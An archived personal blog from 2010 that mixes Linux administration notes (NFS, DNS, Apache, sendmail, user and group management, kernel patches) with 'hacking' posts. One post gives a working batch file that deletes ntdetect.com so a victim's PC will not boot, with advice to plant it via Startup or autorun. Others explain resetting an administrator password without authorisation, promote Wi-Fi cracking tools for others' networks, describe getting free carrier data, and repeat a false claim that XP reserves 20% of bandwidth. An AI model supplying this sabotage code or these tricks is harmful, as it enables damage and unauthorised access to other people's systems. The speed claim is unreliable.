Tuesday, August 24, 2010

NFS Server Configuretion

################### NFS ###################################

Requirements
• Packages
  portmap-4.0-63.i386.rpm
  nfs-utils-1.0.6-46.i386.rpm
• Port Numbers
  2049       Nfsd
  111        Portmap
• Configuration File
  /etc/exports
• Service
  portmap
  nfs
• Daemons
  nfsd
  mountd
  statd
  lockd


1)To install packages.
#rpm -ivh portmap-4.0-63.i386.rpm
#rpm -ivh nfs-utils-lib-devel-1.0.8.i386.rpm

2)to create directory.
# mkdir /share

3)to export directory.
#vim /etc/exports
/share *(rw,sync)    -- sync --> syncronisation.
or
/share 10.0.0.0/255.0.0.0(ro,sync)
or
/share 10.0.0.0/255.0.0.0(ro,async)

4)to restart the services.
#service portmap restart
#service nfs restart

5)To check nfs server.
#showmount -e
#showmount -e 10.0.0.1


#####################################################################


Configuring Client

1)Create Mount point on client
#mkdir /nfs

2)Mount remote shared filesystem on local mount point
#mount 10.0.0.1:/share /nfs
#cd /nfs



###################### Advanced Practical #############################




*To share the nfs server for different networks.

1)To assigne the virtual IP.
2)export the directory & assigne the permitions.
3)restart the service.
4)Try to connect from client side.


*To assigne the virtual IP.
#netconfig --device eth0:1
10.0.0.2 255.0.0.0

*Restart the service.
#service network restart

*To configure the export file.
#vim /etc/exports

/share 10.0.0.3/8(ro,sync)

/share 10.0.0.0/8(rw,sync)

/reliance 192.168.1.0/24(rw,sync)

*To create the directory.
#mkdir /reliance
#chmod 777 /reliance/

*To restart the service.
# service portmap restart
#service nfs restart

*To check.
#exportfs -rav



############## Client side configuretion.##########################

*To check from clientside.
#showmount -e (server IP)
#showmount -e 10.0.0.2
*To create the directory.
#mkdir /mount

*To mount the export directory by server.
#mount 10.0.0.2:/reliance /mount

*Directory should be mount but that directory is a read-only.


###################### END ###############################

Live DNS Setup

########## LIVE DNS SETUP WITH WEB SERVER ###############

1)hostname configuretion file.

#vim /etc/sysconfig/network



2)To assign hostname temp.

#hostname server1.example.com



3)To install packages.

#rpm -ivh bind* --force --aid

#rpm -ivh caching-nameserver-9.3.3-7.el5.i386.rpm



4)DNS configuretion file



#vim /var/named/chroot/etc/named.conf



options {

directory "/var/named";

};





zone "example.com" IN {

type master;

file "example.for";

};



zone "0.168.192.in-addr.arpa" IN {

type master;

file "example.rev";

};





5)Go into this path.

#cd /var/named/chroot/var/named/



6)Copy the file

#cp localhost.zone example.for



7)Copy the file

#cp named.local example.rev



8)To change the owenership.

#chown named.named example*



9)To configure the file(.for)

#vim example.for



$TTL 86400

@ IN SOA server1.example.com. root (

                                                          42 ; serial (d. adams)

                                                          3H ; refresh

                                                          15M ; retry

                                                          1W ; expiry

                                                          1D ) ; minimum



IN       NS      server1.example.com.


server1     IN    A   192.168.0.1

server2     IN    A   192.168.0.2

server3     IN    A   192.168.0.3 --------> (windows machine)

www        IN    CNAME   server1





10)To configure the file(.rev)

#vim example.rev



$TTL 86400

@ IN SOA server1.example.com.                               root.server1.example.com. (

                                                                                   1997022700 ; Serial

                                                                                   28800 ; Refresh

                                                                                   14400 ; Retry

                                                                                   3600000 ; Expire

                                                                                   86400 ) ; Minimum

IN     NS     server1.example.com.



1       IN      PTR     server1.example.com.

2       IN      PTR     server2.example.com.





11)To configure the file.

#vim /etc/resolv.conf

nameserver 192.168.0.6



12)To restart the srvice.

#service named restart



13)To check.

#host server1.example.com

server1.example.com has address 192.168.0.6



14)To check.

#host 192.168.0.2

2.0.168.192.in-addr.arpa domain name pointer server2.example.com.



15)client side.

#dig (server name)

#dig -x (ip)





############### WEB SERVER CONFIGURETION ####################





1)Matchine name.

#hostname server1.example.com

#vim /etc/sysconfig/network

HOSTNAME= server1.example.com



2)Matchine IP.

192.168.0.1



3)To install package.

#rpm -ivh httpd* --force



4)Open configuretion file.

#vim /etc/httpd/conf/httpd.conf



LINE NO-250

ServerAdmin root@server1.example.com



LINE NO-264

ServerName www.example.com:80

LINE NO-280

DocumentRoot "/var/www/html"

LINE NO-305


LINE NO-390

DirectoryIndex index.html index.html.var



5)To create a html file.

#vim /var/www/html/index.html



6)To restart the service.

#service httpd restart



7)To open the file.

# vim /etc/hosts

192.168.0.253 www.example.com



8)To check the page.

open the firefox & check.



###############################################################



From windows client machine.

Machine Name --> server3

My network place --> Property --> Tcp/IP --> Property --> DNS 192.168.0.2
 
##################### END ##################################### 

Mail Server Configuretion

############## TO configure the sendmail.##############

1)To assigne the hostname.
mail.example.com

2)To configure the DNS Mster server.
#rpm -ivh bind* --force

3)Open the configuretion file.
#vim /var/named/chroot/etc/named.conf

options {
     directory "/var/named";
};

zone "example.com"{
   type master;
   file "example.for";

4)Copy the file
#cp /usr/share/doc/bind-9.3.3/sample/var/named/localdomain.zone /var/named/chroot/var/named/example.for

5)To open the file.
#vim /var/named/chroot/var/named/example.for
$TTL    86400
@               IN SOA  mail.example.com. root (
                                        42              ; serial (d. adams)
                                        3H              ; refresh
                                        15M             ; retry
                                        1W              ; expiry
                                        1D )            ; minimum
                IN NS           mail.example.com.
                IN MX 14        mail.eample.com.
mail            IN A            10.0.0.1

6)To restart the service.
# service named restart

7)To check.
#dig mail.example.com
#dig -t MX example.com

################# To confgure sendmail.################
1)To install the package.
#rpm -ivh sendmail* m4* --force

2)To open the configuretion file.
#vim /etc/mail/sendmail.mc
LINE NO-116
dnl #DAEMON_OPTIONS(`Port=smtp,Addr=127.0.0.1, Name=MTA')dnl
To comment this line.

LINE NO-155
LOCAL_DOMAIN(`mail.example.com')dnl

3)To compile the sendmail.mc file.
# m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf

4)To restart the service.
#service sendmail restart

5)To open the /etc/hosts file
#vim /etc/hosts
127.0.0.1       localhost.localdomain   localhost    mail.example.com     mail

MAIL SERVER configuretion is over.

6)To create user.
#useradd u1
#useradd u2
#useradd u3
#passwd u1
#passwd u2
#passwd u3

*SQUERREL MAIL configuretion.

1)To install the packages.
squirrelmail*
dovecot*
curl*
php*
perl*
cyrus*
httpd*

2)Restart the following servicec.
# service httpd start
#service dovecot start
#service cyrus-imapd start
#service saslauthd start

To client side configuretion.
#vim /etc/resolve.conf
nameserver 10.0.0.1(webmail server ip)

User & Group Administration

########## USER, GROUP ADMINISTRATION. ##########

*Unix/Linux is multi user and multi tasking OS.
*Scheme :-
  #User always get created with primary group
  # One Primary Group per User

*When a user is created in Linux :--
--> home directory ( /home/username)
--> mail account     (/var/spool/mail/username)
--> unique UID & GID

*Types of Users.
System Users--> 0 — 499
Normal Users--> 500 — 60,000

User and Group Administration Database Files.
#/etc/passwd
root:x:0:0:root:/root:/bin/bash
u1:x:500:500::/home/u1:/bin/bash

#vim /etc/passwd
    u1:x:500:500:prog:/home/u1:/bin/bash
    |  |  |   |    |      |        |
    1  2  3   4    5      6        7

    Discription : -

    1. First field     : - Login name of the User
    2. Second field    : - Clear text encrypted password
                            Note: In case if shadowing is enabled it always denotes a
                            "x" which means the password is stored in /etc/shadow file
    3. Third field     : - User id which is unique to every user
    4. Fourth field    : - Group id which is unique to every group
    5. Fifth field     : - Comments i.e. user related info like Full Name, Office Add.,Off. No., Home No.
    6. Sixth field     : - Home directory
    7. Seventh field   : - Login shell
################################################################

#/etc/shadow
root:$1$d.MWHOEJ$zeLZ2sfTBhNVVWxzpwoAv/:14281:0:99999:7:::
u1:$1$SIOUwX2W$VO/QJmvEp13mlZ9E5B/EP1:14285:0:99999:7:::

#vim /etc/shadow
    u1: hjkadfhs8974uyh5jrt/ :13536:0:99999:7: : :
    |           |               |   |   |   | | | |
    1        2               3   4   5   6 7 8 9

      Discription : -

        1. First field     : - Login name of the User.
        2. Second field    : - Clear text encrypted password.
        3. Third field     : - Number of days since January 1 1970, when the password was last changed.
        4. Fourth field    : - Minimum number of days gap before a password can be changed again.
        5. Fifth field     : - Maximum number of days for the validity of a password.
        6. Sixth field     : - Warning for password expiry to be given before the stipulated number of days.
        7. Seventh field   : - Number of days after the expiration of password that the account should be disabled.
    8. Eight field     : - Number of days since 1 January 1970, the account is disabled.
    9. Ninth field     : - Reserved field.

###############################################################

#/etc/group
root:x:0:root
u1:x:500:

/etc/group
    u1:x:500:sachin,tom
    |  |  |     |
    1  2  3     4

    Discription :-
    1. Group Name
    2. Shadow passwd
    3. GID
    4. Groupmembers



###################### NEW USERS ###############################

*To create new users.

1)To change UID.
#useradd -u 501 u1
#passwd u1

2)To change primary group.
#useradd -g 501 u2
#passwd u2

*If we change & overwrite the group id so that
should be existed.

3)To overwrite.
#useradd -u 700 -o lax
#usermod -g 700 -o u3

4)To change secondary group.
#useradd -G 700 lax2
#usermod -G 700 lax3

5)To insert the comment.
#useradd -c "pranay" u4
#usermod -c "vijay" u3

6)To change the home directory.
#useradd -d /vikas u4
#usermod -d /vikas u3


7)To change the shell.
#useradd -s /bin/csh u1
#passwd u1
To check.
#tail /etc/passwd
u1:x:561:562::/home/u1:/bin/csh

##################### MODIFY USERS #############################

To modify the existing users by "usermod" command.

1)To modify the user login name.
#usermod -l vikas u1
            (N.N) (O.N)
N.N- new name.
O.N- old name.

To check.
# tail /etc/passwd
vikas:x:561:562::/home/u1:/bin/csh

2)To lock the account.
#usermod -L u1

3)To unlock the account.
#usermod -U u1

4)To change the comments.
#usermod -c "laxman" u1
#tail /etc/passwd
u1:x:561:562:laxman:/home/u1:/bin/csh

5)To modify the shell.
#usermod -s /bin/bash u1
#tail /etc/passwd
u1:x:561:562:laxman:/home/u1:/bin/bash

6)To change the UID.
#usermod -u 600 u1
#tail /etc/passwd
u1:x:600:562:laxman:/home/u1:/bin/bash

7)To change the GID with other existing users GID .
#usermod -g 560 u1
#tail /etc/passwd
raj:x:560:560::/home/raj:/bin/bash
u1:x:600:560:laxman:/home/u1:/bin/bash

8)To change the home directory.
#usermod -d /home/u1 u2
#tail /etc/passwd

Before modify the home directory.
u2:x:601:601::/home/u2:/bin/bash

After modify the home directory.
u2:x:601:601::/home/u1:/bin/bash


################### T0 DLETE A USER  ##############################


To Delet the user without home directory.
#userdel u1

To Delet the user with home directory.
#userdel -r u1
-r --> recursively.

##################################################################

*To change user setting.
#chage u3
Changing the aging information for u3
Enter the new value, or press ENTER for the default

        Minimum Password Age [0]:
        Maximum Password Age [99999]:
        Last Password Change (YYYY-MM-DD) [2009-02-09]:
        Password Expiration Warning [7]:
        Password Inactive [-1]:
        Account Expiration Date (YYYY-MM-DD) [1969-12-31]:



############### GROUP ADMINISTRATION ########################


1)To create a group.
#groupadd sales

2)To change the GID on new group.
#groupadd -g 700 mkt

3)To check.
#tail /etc/group
sales:x:602:
mkt:x:700:

4)To override.
#groupadd -g 800 -o admin
#tail /etc/group
sales:x:602:
mkt:x:700:
admin:x:800:

*To modify the group.

1)To modify the existing group.
#groupmod -g 610 sales
#tail /etc/group

Before.
sales:x:602:
After.
sales:x:610:

2)To change the groupname.
#groupmod -n marketing mkt
             (N.N)    (O.N)
#tail /etc/group

Before.
mkt:x:710:
After.
marketing:x:710:

3)To add user into group.

Add single user.
#gpasswd -a u3 admin
Adding user u3 to group admin

Add multyple users.
#gpasswd -M u4,u5 admin

To check.
#tail /etc/group
admin:x:800:u4,u5,u3

To delet a user from group.
#gpasswd -d u3 admin
Removing user u3 from group admin
You have new mail in /var/spool/mail/root

#tail /etc/group
admin:x:800:u4,u5

*To Delet a group.
# groupdel sales
################## END #########################

Monday, August 23, 2010

Crash ur Friends PC


I dont know wether it works or not so better be careful
HEY HERE IS THE SIMPLE WAY 2 BLOCK URS ENEMEIS PC
The Simple Deadliest Code
open notepad type the code as following -
___________________________________________________
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print U r a LOSER.. PC Hacked by DRG!!!
____________________________________________________
save this file as virus.bat or any other name with bat extension
Double click it in the victim’s computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.
BANG !
with this activated once the computer will run perfectly !
once shutdowned then it will not start and U will have to format it (Except U know how to use DOS).
Enjoy !!
**********DON’T TRY ON YOUR COMPUTER I HAVE EXPERIENCED IT….LOL**********
P.S. :- IF THERE IS ANY MISTAKE IN CODE THEN PLEASE GUIDE ME

Hack Computer Administrator


Hack Admin Tutorial:
If you want to hack A computer’s Administrator that is very easy.
If you are logged in to computer with some other account here are the steps:
1. Go to Start button click on run
2. Type CMD and press enter
3. A command window will open
4. Type net users
5. This will show you all the users of that computer.
6. Now type net user administrator * and press enter
7. This will ask you to enter a password
8. Enter the password you want to keep for the administrator
9. Re-enter your password to confirm it.
10. DONE
You have changed the password of computer administrator. Now you can logoff that user and can login as administrator with the password you have kept.
HAPPY HACKING :)

Hacking Tools For Linux


Interested in knowing about the Best Hacking Tools for Linux:
Many people all around the world are just transforming themselves from windows to Linux operating systems, the reason is security, and also many feel that it is quite easy to hack from Linux rather than from windows. so I just planned to Share some of the most efficient tools that are used mainly these days to hack a website or a victim or whatever. So the Below complete list provides you some of the best hacking tools of Linux, Go ahead and choose the one of your choice…
*Ettercap:
Ettercap is a console-based network sniffer/interceptor/logger that is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. Ettercap supports active and passive dissection of many protocols (including ciphered ones) and provides many features for network and host analysis. Ettercap also has the ability to actively or passively find other poisoners on the LAN.
* Nikto
Nikto is a web server scanner that is known to perform comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. It performs generic and server type specific checks. It also captures and prints any cookies received.
* OpenSSH
OpenSSH is a Free and Open Source version of the SSH connectivity tools providing encrypted communication sessions over a computer network. It encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol versions.


* Aircrack-ng
Aircrack-ng is a wireless tool and password cracker. It is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.


* Tripwire
Tripwire is a security and data integrity tool that is useful for monitoring and alerting on specific file change(s) on a range of systems. Used with system files on a regular basis, Tripwire can notify system administrators of corrupted or tampered files, so damage control measures can be taken in a timely manner.


* Metasploit Framework
Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit-building demo.


* THC Hydra
THC (The Hacker’s Choice) Hydra uses a dictionary attack to test for weak or simple passwords on one or many remote hosts running a variety of different services. It was designed as a proof-of-concept utility to demonstrate the ease of cracking poorly chosen passwords. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more.


* Dsniff
Dsniff is suite of powerful network auditing and penetration-testing tools and utilities that includes code to parse many different application protocols and extract interesting information. The information that can be obtained from this sniff application are: usernames and passwords, web pages being visited, contents of email, etc.



* RainbowCrack
RainbowCrack is a password hash cracker that makes use of a large-scale time-memory trade-off. It differs from “conventional” brute force crackers in that it uses large pre-computed tables called rainbow tables to reduce the length of time needed to crack a password drastically.


* rkhunter
rkhunter scans for rootkits, backdoors and possible local exploits. It does this by comparing SHA-1 hashes of important files with known good ones in online database, searching for default directories (of rootkits), wrong permissions, hidden files, suspicious strings in kernel modules, and special tests for Linux and FreeBSD.

These are various hacking tools that mostly used by hackers all around the world, These tools are more Perfect and gives a Steady Tracking of the Victim. So, if you are finding for one such Linux hacking tool, then Just Choose the Best one which suits you more. Hope u liked the article, Feel free to write comments, Happy Hacking :)

How to remove new folder exe or regsvr exe or autorun inf virus


Here is The Best way to Remove the Virus Manually When your Antivirus Fails:
  • Search for autorun.inf file. It is a read only file so you will have to change it to normal by right clicking the file , selecting the properties and un-check the read only option

  • Open the file in notepad and delete everything and save the file.

  • Now change the file status back to read only mode so that the virus could not get access again.

  • Now Follow the Steps Below, and do as said,

  • First Step:
    1. Click start->run and type msconfig and click ok
    2. Go to startup tab look for regsvr and uncheck the option click OK.
    3. Click on Exit without Restart, cause there are still few things we need to do before we can restart the PC.
    4. Now go to control panel -> scheduled tasks, and delete the At1 task listed their.
    Second Step:
    • Click on start -> run and type gpedit.msc and click Ok.
    • If you are Windows XP Home Edition user you might not have gpedit.msc in that case download and install it from Windows XP Home Edition: gpedit.msc and then follow these steps.
    • Go to users configuration->Administrative templates->system
    • Find “prevent access to registry editing tools” and change the option to disable.
    • Once you do this you have registry access back.
    Third Step:
    • Click on start->run and type regedit and click ok
    • Go to edit->find and start the search for regsvr.exe
    • Delete all the occurrence of regsvr.exe; remember to take a backup before deleting. KEEP IN MIND regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences only.
    • At one ore two places you will find it after explorer.exe in theses cases only delete the regsvr.exe part and not the whole part. E.g. Shell = “Explorer.exe regsvr.exe” the just delete the regsvr.exe and leave the explorer.exe
    Fourth Step:
    • Click on start->search->for files and folders.
    • Their click all files and folders
    • Type “*.exe” as filename to search for
    • Click on ‘when was it modified ‘ option and select the specify date option
    • Type from date as 1/31/2008 and also type To date as 1/31/2008
    • Now hit search and wait for all the exe’s to show up.
    • Once search is over select all the exe files and shift+delete the files, caution must be taken so that you don’t delete the legitimate exe file that you have installed on 31stJanuary.
    • Also selecting lot of files together might make your computer unresponsive so delete them in small bunches.
    • Also find and delete regsvr.exe, svchost .exe( notice an extra space between the svchost and .exe)
    Fifth Step:
    • Now do a cold reboot (ie press the reboot button instead) and you are done.
    I hope u liked the article, to fight around all those virus and trojans, hope your happy now :) so kindly leave a comment….

    Wanna hack Wi-fi Passwords using your Ubuntu Linux?


    Hacking Wi-Fi Password Using Ubuntu Linux – I know a lot of you out there would love to know how to hack or crack Wi-Fi passwords from coffee shops or just about any place with managed or secured network.
    I’ve already featured several hacking software before, and some of which can help you crack Wi-Fi passwords be it WEP or WPA protected. This time, I’m going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi password using Ubuntu or any other Linux distribution:
    Aircrack-ng (a fork of aircrack) is my main tool for cracking Wi-Fi passwords. It has awireless network detector, a packet sniffer, WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.
    Kismet is a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any loggable packets.
    SWScanner is specifically designed to make the whole wardriving process a lot easier. It is also intended to manage many tasks related to wireless networking. SWScanner is compatible with NetStumbler files and can be integrated with GPS devices.
    These are only three of the many wireless tools that can get you going in no time, so feel free to explore.
    I don’t want to give a step-by-step instruction just yet on how to hack or crack WiFi password using Ubuntu, but for a little inspiration, I’ll share with you a YouTube video that pretty much illustrate the process of using those Wi-Fi hacking software:
    I hope u learnt alot frm this article, If u like this, Feel Free to Leave a Comment :)

    Free Internet using Sim


    Sim hack: works on idea and airtel (havent tested in other sim’s)
    First Lets Start with the requirments:
    1. You Need a sim with minimum of 0.20 credit in it or even with no credit,but make sure the gprs signal is visible.
    2. You need a phone that can be used as a modem to connect your computer to the internet. Such as Nokia phones with Nokia PC suite software or Motorola Phones with M Phone tools software.
    3. You Need a Computer or Laptop
    4. You need to register on 
    your freedom and get your username and password to use the software.
    (your registered username and details of registeration will be sent to the email u used in registering,it might take a while for ur account to be authenticate
    5. Download Your Freedom from here: http://www.your-freedom.net/index.php?id=3 (use the latest version)
    NOW LETS START SETTING UP YOUR COMPUTER YOUR FREE BROWSING!!
    1. Dowload and Install Your-Freedom and enter these settings.
    Let me just explain everything step by step. Open Your-Freedom
    -Click on the status tab. Then clicked on configure.
    - On the server connection tab.Use these settings:
    Address: ems24.your-freedom.de
    Port:53
    Connection Mode: UDP
    now on the option below it
    check boxes Numbers 3,5,6,7,8
    Next Click on Account Information and enter the username and password you recieved when you registered
    Next Click on Proxy Settings Tab and enter these settings.
    Proxy Address: 94.126.16.6.7
    Proxy Port:53
    Proxy Username: “leave this blank”
    Proxy Password: “leave this blank”
    Proxy Domain: “leave this blank”
    Proxy Type: HTTP/HTTPS
    Proxy Authentication: Any or none
    User Agent: “leave this blank”
    FTP Proxy Server:
    Proxy Address “leave this blank”
    Proxy Port: “leave this blank”
    Now click on Save and Exit.
    Now on the Your-Freedom Menu. Click on ports and tick OPEN VPN, SOCKS 4/5, and WEB PROXY,
    Click on messages
    Check Auto scroll
    minimum level – DEBUG
    CLICK ON APPLICATION,tick the browsers and instant messanges you will use and then click ok
    Now download Firefox or any other browser. its better to download firefox :) and just follow the below configuration
    open firefox goto – tools – options -Advanced – Network – settings – clik on Manual Proxy configuration. Then for http,ssl,ftp,gopher enter as localhost posrt:8080 for socks host localhost port: 1080. in No proxy for: localhost, 127.0.0.1
    click ok…
    now make a default connection using ur PC suite and check wether the gprs signal is present in the mobile.. make a new connection and open your freedom now, click start connection and Njoy free internet… Happy hacking.. still u have any doubts leave a comment i will clarify :)
    Dont forget to say a thx :D

    Here are a few steps to keep your Wireless Network secure


    “Remember nothing is unbreakable”
    1) Secure your wireless router or access point administration interface
    Almost all routers and access points have an administrator password that’s needed to log into the device and modify any configuration settings. Most devices use a weak default password like “password” or the manufacturer’s name, and some don’t have a default password at all. As soon as you set up a new WLAN router or access point, your first step should be to change the default password to something else. You may not use this password very often, so be sure to write it down in a safe place so you can refer to it if needed. Without it, the only way to access the router or access point may be to reset it to factory default settings which will wipe away any configuration changes you’ve made.
    2) Don’t broadcast your SSID
    Most WLAN access points and routers automatically (and continually) broadcast the network’s name, or SSID (Service Set IDentifier). This makes setting up wireless clients extremely convenient since you can locate a WLAN without having to know what it’s called, but it will also make your WLAN visible to any wireless systems within range of it. Turning off SSID broadcast for your network makes it invisible to your neighbors and passers-by (though it will still be detectible by WLAN “sniffers like kismet”).

    3)Enable WPA/WPA2 encryption instead of WEP
    802.11′s WEP (Wired Equivalency Privacy) encryption has well-known weaknesses that make it relatively easy for a determined user with the right equipment to crack the encryption and access the wireless network. A better way to protect your WLAN is with WPA (Wi-Fi Protected Access). WPA provides much better protection and is also easier to use, since your password characters aren’t limited to 0-9 and A-F as they are with WEP. WPA support is built into Windows XP (with the latest Service Pack) and virtually all modern wireless hardware and operating systems. A more recent version, WPA2, is found in newer hardware and provides even stronger encryption, but you’ll probably need to download an XP patch in order to use it.
    4) Remember that WEP is better than nothing
    If you find that some of your wireless devices only support WEP encryption (this is often the case with non-PC devices like media players, PDAs, and DVRs), avoid the temptation to skip encryption entirely because in spite of it’s flaws, using WEP is still far superior to having no encryption at all. If you do use WEP, don’t use an encryption key that’s easy to guess like a string of the same or consecutive numbers. Also, although it can be a pain, WEP users should change encryption keys often– preferably every week.
    5) Use MAC filtering for access control
    Unlike IP addresses, MAC addresses are unique to specific network adapters, so by turning on MAC filtering you can limit network access to only your systems (or those you know about). In order to use MAC filtering you need to find (and enter into the router or AP) the 12-character MAC address of every system that will connect to the network, so it can be inconvenient to set up, especially if you have a lot of wireless clients or if your clients change a lot. MAC addresses can be “spoofed” (imitated) by a knowledgable person, so while it’s not a guarantee of security, it does add another hurdle for potential intruders to jump.
    6) Reduce your WLAN transmitter power
    You won’t find this feature on all wireless routers and access points, but some allow you lower the power of your WLAN transmitter and thus reduce the range of the signal. Although it’s usually impossible to fine-tune a signal so precisely that it won’t leak outside your home or business, with some trial-and-error you can often limit how far outside your premises the signal reaches, minimizing the opportunity for outsiders to access your WLAN.
    7) Disable remote administration
    Most WLAN routers have the ability to be remotely administered via the Internet. Ideally, you should use this feature only if it lets you define a specific IP address or limited range of addresses that will be able to access the router. Otherwise, almost anyone anywhere could potentially find and access your router. As a rule, unless you absolutely need this capability, it’s best to keep remote administration turned off. (It’s usually turned off by default, but it’s always a good idea to check.)

    Increase Internet Speed XP by 20%


    We knew that Windows XP Professional has limited the net on 20%?
    That is, you have access to only 80% of its net, making it much slower loading web pages, etc .. including Downloads….
    This tutorial will show you step by step ways to increase your internet to 100%, You will feel the Real Difference after the changes…
    Follow these steps to make your net 100% ‘
    1. start menu …. (Run)
    2. In run type … gpedit.msc
    Will open the Group Policy!
    3 Open the folder “Models administrator”
    4 Open the folder “Network”
    5 Open the folder “Packet Scheduler” QoS
    6 Click two times on “Limit reservable bandwidth”
    A window will open with three options!
    ? Not Configured.
    ? On.
    ? Off
    Check “Enabled”.
    And where shown 20%, and erase it and make it “0″.
    Click “Apply” and then “Ok”
    Now your ready to use 100% of your Internet…. 

    Saturday, August 21, 2010

    Itc Questions

         1 after creating a directory what would be the linked list?
          
         2 what is the inode ? and tell me the inode table?
          
         3 how do we find out the mysql databases sizes?
          
         4 how to patch the kernal & revert back ?
          
         5 tell me the 5 fields of cron?
          
         6 how to create a swap in linux?
          
         7 make old-config ?

    What is an inode?

    Index node to refer file in Unix System


    An inode is an entry in a disk table that contains information about a file such as its owner, size, and last
    access date. The inode is changed when the file is first created and also later if the owner, group, or permissions are changed.


    I nodes are objects used to record the information about files


    Inode is a structure contains the information necessary for
    a process to access a file.Exist in a static form on disk
    and the kernel reads them into an in-core inode. 
    consists of 
      - file owner identifier
      - file type
      - file access permissions
      - file access times 
      - number of links to the file
      - table of  contents for the disk address of data in   a file
      - file size
    
    in-core copy of the inode contains
      - status of the in-core inode
      - logical device number of file system
      - inode number
      - pointers to other in-core inodes
      - reference count
    Inode Contains all the details about a file like owner, 
    permission, type....... etc. But it doesn't Contain  
    the "Filename" for the paticular file.
    inode is basically store information about files and
    folders. it is an flat array that store index numbers for
    each file.

    Working with Linux patches


    This topic will use the Linux kernel as an example, but this method can be applied to any source tree. This topic assumes a Linux host or Cygwin installed on a Windows host.
    To create a patch one uses the GNU diff command, and to apply a patch one uses the GNU patch command. Both should be available on your Linux system, or in your Cygwin installation.

    Creating a patch

    You always keep yourself one level up in the directory structure from the directory you want to patch when you execute the diff command. Note that the -u flag is used, which generates unified diff. The -r flag used is to traverse all subdirectories recursively, and the -N flag makes sure files missing in one of the directories still gets added to the patch. And of course you'll want to 'clean' (make distclean) before making the patch:
    make distclean
    So, let's say you have made changes to a Linux kernel. I keep the original kernel tree I am working from in the linux-2.6.13-orig directory. I keep my changes in a separate tree, linux-2.6.13-mine. To generate a patch file describing my changes with the delta between the two versions I would execute:
    diff -uNr linux-2.6.13-orig linux-2.6.13-mine > patch-2.6.13-mytag
    This creates a file called patch-2.6.13-mytag, which is an uncompressed patch file. Note that this is readable text, and you should read through it as a sanity check to make sure no dot-files or other junk got in there by mistake.
    Also, note the size of the patch file. It should be relatively small. For example, if your source code that has changed consists of a few files that are ~10KB, the patch file should be on the order of 10-20KB.
    It is important that the patch file (which again is only a text file) is in UNIX mode and not DOS mode (depending on where you have edited the file). Please run the following command on your patch:
    file patch-2.6.13-mytag
    If you get: patch-2.6.13-mytag: 'diff' output text then your patch should be in the correct mode. If you get something like patch-2.6.13-mytag: ASCII English text, with CRLF line terminators or similar (note the CRLF which means DOS mode), action is required.
    To put the file in UNIX mode (i.e. remove all the CR characters) execute:
    tr -d '\r' < patch-2.6.13-mytag.dosmode > patch-2.6.13-mytag.unixmode
    Alternatively you can use the dos2unix command, but if only parts of the file is in DOS mode this can yield bad results.
    It is also important to make sure that applications do not automatically translate the patch files to DOS mode when transferring the file (i.e. mail clients or web browsers). To prevent this (and of course to reduce the size of the file) you should compress the patch. To compress the patch file using bzip2 execute:
    bzip2 -9 patch-2.6.13-mytag
    This will create a compressed patch with the name patch-2.6.13-mytag.bz2.
    You should replace the mytag part of the filename with something describing the patch. It could be your name, the name of your team, or the ISA the patch is for.
    Summary:
    • make distclean
    • diff -uNr linux-2.6.13-orig linux-2.6.13-mine > patch-2.6.13-mytag
    • file patch-2.6.13-mytag optionally followed by:
      • tr -d '\r' < patch-2.6.13-mytag.dosmode > patch-2.6.13-mytag.unixmode
    • bzip2 -9 patch-2.6.13-mytag

    Applying a patch

    Patches you download are generally compressed. If they end with the .gz extension they are compressed with gzip (patch-2.6.13-sometag.gz). To uncompress this file type:
    gunzip patch-2.6.13-sometag.gz
    This will create an uncompressed patch file called patch-2.6.13-sometag.
    Alternatively the patch ends with the .bz2 extension, in which case you will have to execute the following to uncompress:
    bzip2 -d patch-2.6.13-sometag.bz2
    This will also create an uncompressed patch file called patch-2.6.13-sometag.
    If the file has no ending, it is most probably uncompressed. If you have doubts, execute the following command to get information on the file type:
    file patch-2.6.13-sometag
    If it's uncompressed it should say that it's a file of type 'diff' output text. To apply the patch, move into the project directory (linux kernel directory in this case, for instance the directory linux-2.6.13) and type:
    patch -p1 < ../patch-2.6.13-sometag
    This should apply the patch delta to your baseline project directory.
    The -p1 option means patchlevel 1. This means that it should skip one level of directories when applying the patch. If you view the patch-2.6.13-mytag file from above, it would read on the first two lines:
    --- linux-2.6.13-orig/ Thu Nov 28 23:53:15 2002
    +++ linux-2.6.13-mine/ Tue Dec 3 22:54:07 2002
    
    This shows which file to start applying patches to. The -p1 option makes the patch command ignore the first linux-2.6.13-orig and linux-2.6.13-mine directories when applying the patch.
    Summary:
    • gunzip patch-2.6.13-sometag.gz or bzip2 -d patch-2.6.13-sometag.bz2.
    • file patch-2.6.13-sometag
    • cd /path/to/kernel
    • patch -p1 < /path/to/patch-2.6.13-sometag

    Reverting a patch

    Sometimes you want to try out the contents of a patch, but perhaps the patch introduced bugs you currently don't want to deal with. Fortunately, there is a way to revert patches. To revert the patch applied above, execute the following (from the linux-2.6.13 directory):
    patch -Rp1 < patch-2.6.13-sometag
    This will restore the kernel tree to the state it was before the patch was applied.

    How to survive with many patches

    If the number of patches you deal with increases, it becomes inconvenient to do this manually. Then you may like to have a look to quilt. See How To Survive With Many Patches for an introduction to quilt.

    Sending patches upstream

    Handling patch rejects

